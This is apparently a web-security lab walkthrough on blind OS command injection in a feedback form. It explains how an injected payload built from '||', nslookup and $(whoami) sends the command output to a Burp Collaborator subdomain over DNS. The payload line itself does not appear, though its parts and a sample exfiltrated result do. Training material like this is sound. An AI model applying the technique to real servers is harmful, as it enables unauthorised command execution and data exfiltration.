Blind OS command injection with out-of-band data exfiltration
PreviousBlind OS command injection with out-of-band interactionNextCross-Origin Resource Sharing (CORS)
Last updated
Was this helpful?
Last updated
Was this helpful?
This lab focuses on blind OS command injection, where command outputs are exfiltrated via DNS queries to an external domain. The task is to execute the whoami command and exfiltrate the result using Burp Collaborator.
The Submit Feedback page contains four input fields:
Name
Subject
Message
Our goal is to test whether these fields are vulnerable to command injection by leveraging out-of-band (OOB) interactions
Submit the feedback form with dummy data (e.g., test in all fields).
Intercept the request in Burp Suite. The captured HTTP request contains:
The form inputs (e.g., name=test, email=test@test.net).
Other metadata such as CSRF tokens and cookies.
Objective: Modify one of these parameters to inject a payload that executes the whoami command and exfiltrates its output via a DNS query to Burp Collaborator. This will confirm both command injection and successful data exfiltration.
Step 4: Crafting the Payload
Modify one of the input fields (e.g., email) to inject the following payload:
Payload Explanation:
||: Delimiters to separate commands.
nslookup: Executes a DNS lookup.
$(whoami): Executes the whoami command and appends the output to the DNS query.
BURP-COLLABORATOR-SUBDOMAIN: Your unique Collaborator server address.
Look for DNS queries logged by Burp Collaborator.
The queried domain will contain the output of the whoami command, such as peter-Nrsm8s.BURP-COLLABORATOR-SUBDOMAIN.
This confirms that:
The server executed the injected command.
The command output (peter-Nrsm8s) was exfiltrated successfully.
